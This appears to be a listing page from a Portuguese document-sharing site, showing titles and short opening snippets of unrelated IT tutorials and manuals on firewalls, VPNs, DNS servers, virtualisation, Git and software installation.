Criar uma máquina virtual Date : 19 de Janeiro de 2007 Uma forma de termos na nossa máquina sistemas operativos paralelos sem necessidade de mexer nas partições do disco é usufruir da "virtualização" de
Leia maisLigação entre Rocrail e a Marklin Central Station II (Por Tiago Lobo Dias www.lobodias.com - Tiagolobodias@gmail.com)
Ligação entre Rocrail e a Marklin Central Station II (Por Tiago Lobo Dias www.lobodias.com - Tiagolobodias@gmail.com) Este pequeno manual serve para ajudar a fazer a ligação entre o software Rocrail e
Leia maisAcronis Snap Deploy 2.0 Guia de Instalação
Acronis Snap Deploy 2.0 Guia de Instalação Copyright Acronis, Inc., 2000-2008. Todos os direitos reservado. Windows e MS-DOS são marcas registradas da Microsoft Corporation. Todas as outras marcas são
Leia maisJessey Bullock Jeff T. Parker
Jessey Bullock Jeff T. Parker Novatec All rights reserved. This translation is published under license with the original publisher John Wiley & Sons, Inc. Copyright 2017 by John Wiley & Sons, Inc., Indianapolis,
Leia maisIPCop - Aprenda a instalar uma Firewall poderosa e gratuita
IPCop - Aprenda a instalar uma Firewall poderosa e gratuita Date : 28 de Setembro de 2011 Por Tiago Ramalho para o PPLWARE Tal como tinha prometido, aqui está a continuação do artigo anterior IPCop Uma
Leia maisSegurança de Redes 5º Semestre
Segurança de Redes 5º Semestre Evasão de Firewall Prof. Nataniel Vieira nataniel.vieira@gmail.com SERVIÇO NACIONAL DE APRENDIZAGEM COMERCIAL FACULDADE DE TECNOLOGIA SENAC PELOTAS Objetivos Conhecer os
Leia maisFerramentas Web, Web 2.0 e Software Livre em EVT
E s t u d o s o b r e a i n t e g r a ç ã o d e f e r r a m e n t a s d i g i t a i s n o c u r r í c u l o d a d i s c i p l i n a d e E d u c a ç ã o V i s u a l e T e c n o l ó g i c a BRUSHster M a
Leia maisCrie a sua Wikipedia com o MediaWiki em 15 minutos
Crie a sua Wikipedia com o MediaWiki em 15 minutos Date : 15 de Junho de 2013 Porque continuamos a construir sites? Esta é a questão que coloco depois de nos últimos tempos terem aparecido tantas ferramentas/plataformas,
Leia maisEste é o segundo modulo, nele abordaremos os métodos de gerenciamento do Windows Server 2008.
Gerenciando o Windows Server 2008 Bem vindo(a), Este é o segundo modulo, nele abordaremos os métodos de gerenciamento do Windows Server 2008. Após essa aula você será capaz de: Definir quais são as formas
Leia maisPERIVER PLATAFORMA INSTALLATION MANUAL. Periver_InstallationManual_ _v1.0.doc. Versão v1.0
PLATAFORMA Periver_InstallationManual_2008-06-04_v1.0.doc Versão v1.0 04 de Junho de 2008 TABELA DE REVISÕES Versão Autores Descrição da Versão Aprovadores Data v0.1r António Rocha Ricardo Nobre Ricardo
Leia maisGerando um programa executável a partir de um módulo Python
Gerando um programa executável a partir de um módulo Python Wendel Melo (Departamento de Ciência da Computação UFRJ), Notas de aula de Computação II 15/03/2012 A linguagem de programação Python segue o
Leia maisAprenda como interligar dois locais através de uma VPN
Aprenda como interligar dois locais através de uma VPN Date : 14 de Maio de 2015 Imagine por exemplo que tem uma empresa na Guarda e uma filial em Viseu e pretende constituir uma única rede privada (Guarda+Viseu)
Leia maisSMA PROCEDIMENTO DE ACESSO AO SISTEMA SMA PROCEDIMENTO DE ACESSO AO SISTEMA
SMA PROCEDIMENTO DE ACESSO AO SISTEMA Índice 1. Pré-requisitos... 2 2. Configurando opções de segurança do Internet Explorer... 3 3. Requisição e Instalação dos certificados de acesso... 5 3.1. Instalação
Leia maisConfigurar um servidor de DNS no Ubuntu via Webmin
Configurar um servidor de DNS no Ubuntu via Webmin Date : 13 de Outubro de 2014 Um dos serviços mais importantes em qualquer rede é o DNS (Domain Name System)). Este serviço é responsável pela tradução
Leia maisTransforme o seu Raspberry PI num servidor de DNS
Transforme o seu Raspberry PI num servidor de DNS Date : 28 de Outubro de 2013 Segundo dados divulgados recentemente no site raspberrypi.org, 1,75 milhões é o numero de mini Raspberry Pi vendidos em todo
Leia maisCOLOCANDO A REDE PARA FUNCIONAR
COLOCANDO A REDE PARA FUNCIONAR INTRODUÇÃO Para que uma rede de computadores exista precisamos preencher alguns requisitos tais como: 1 Devem existir 2 ou mais computadores ou então não seria necessária
Leia maisManual de Instalação. Servidor Web LAMP
Manual de Instalação Servidor Web LAMP Instituto do Emprego e Formação Profissional - Centro de Formação Profissional de Santarém CET3 Técnico Especialista em Gestão de Redes e Sistemas Informáticos U20
Leia maisUse Cisco CRS Clients com Microsoft Windows XP SP2
Use Cisco CRS Clients com Microsoft Windows XP SP2 Índice Introdução Pré-requisitos Requisitos Componentes Utilizados Convenções Atualizar um PC que já Executa o Cisco CRS Client para o Windows XP SP2
Leia maisConfiguração Acesso Remoto
28/07/2014 Sumário Sumário... 2 1. Prefácio... 3 1.1 Finaliadde... 3 2. Configuração para acesso remoto com TS... 3 3. Configuração para acesso remoto com Citrix... 10 4. Configuração para acesso remoto
Leia maisInstalação do Visual Studio 2008 beta 2 Tutorial 01
Instalação do Visual Studio 2008 beta 2 Tutorial 01 9/10/2007 Nuno Costa http://istomesmo.wordpress.com Este tutorial explica como instalar a nova versão beta 2 do Visual Studio 2008. Primeiro vamos começar
Leia maisSegurança e Auditoria. Auditoria Coleta de dados, Análise de dados, Auditoria preventiva. de Sistemas
Segurança e Auditoria Auditoria Coleta de dados, Análise de dados, Auditoria preventiva de Sistemas Auditoria Auditaria: Coleta Análise recolher dados sobre o funcionamento de um sistema ou aplicação e
Leia maisPartilha de ficheiros por rede entre Mac e Windows
Partilha de ficheiros por rede entre Mac e Windows Date : 4 de Janeiro de 2010 Hoje temos um post com qualidade extra! Muitos de nós têm mais de um computador em casa, sejam Mac's, Windows, Linux,... E,
Leia maisManual Instalação Web Services Client Web.NewHotel
Web.NewHotel Versão: 2008-07-10 Rev. 2008-12-04 Versão de WSServer: 2008.10.27.0 Versão de WSClient: 2008.11.03.0 Versão de NewHotel: 2008.09.13 Av. Almirante Gago Coutinho, 70 1700-031 Lisboa PORTUGAL
Leia maisIntegrated Government Resources Planning IGRP Open Source. Como importar e contribuir - GitHub. Núcleo Operacional da Sociedade de Informação
Núcleo Operacional da Sociedade de Informação 23-05-2017 Integrated Government Resources Planning IGRP Open Source Como importar e contribuir - GitHub Índice Listas de Figuras... 2 Introdução... 3 Instalação
Leia maisTutorial para Instalação do dotproject
Tutorial para Instalação do dotproject O objetivo deste tutorial é apresentar o processo de instalação do dotproject. Também serão abordadas informações sobre a instalação do pacote de tradução e possíveis
Leia maisGit e Pais
Git e GitHub @Sebastião Pais O que é Git? "Git é um sistema de controle de versão distribuida, rápido e escalável" Basicamente é um versionador de ficheiros, é utilizado principalmente para gerir versões
Leia maisConfigurar o Concentradores Cisco VPN série 3000 para apoiar os recursos de expiração de senha de NT com o servidor Radius
Configurar o Concentradores Cisco VPN série 3000 para apoiar os recursos de expiração de senha de NT com o servidor Radius Índice Introdução Pré-requisitos Requisitos Componentes Utilizados Diagrama de
Leia mais